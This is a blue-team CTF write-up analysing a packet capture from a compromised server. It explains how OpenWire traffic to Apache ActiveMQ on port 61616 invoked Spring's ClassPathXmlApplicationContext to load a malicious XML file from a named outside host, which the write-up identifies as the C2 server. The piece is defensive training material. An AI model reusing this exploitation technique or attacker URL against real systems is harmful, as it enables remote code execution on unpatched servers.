During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.
https://cyberdefenders.org/blueteam-ctf-challenges/openwire/
By reviewing the traffic, I noticed the use of the OpenWire protocol in packets 4 and 5, which immediately stood out as unusual. I followed the TCP stream for these packets and observed an Exception Response (0x1F) being sent. This response invoked the org.springframework.context.support.ClassPathXmlApplicationContext class, which then attempted to load a bean definition from an external XML file. The XML file was being retrieved from http://146.190.21.92:8000/invoice.xml. Since this IP is hosting the malicious XML used to trigger the exploit // C2 server: 146.190.21.92.
From the packet capture, it’s clear that the Exception Response was directed at the service listening on port 61616. This port is commonly used by Apache ActiveMQ, which matches the exploitation activity observed.
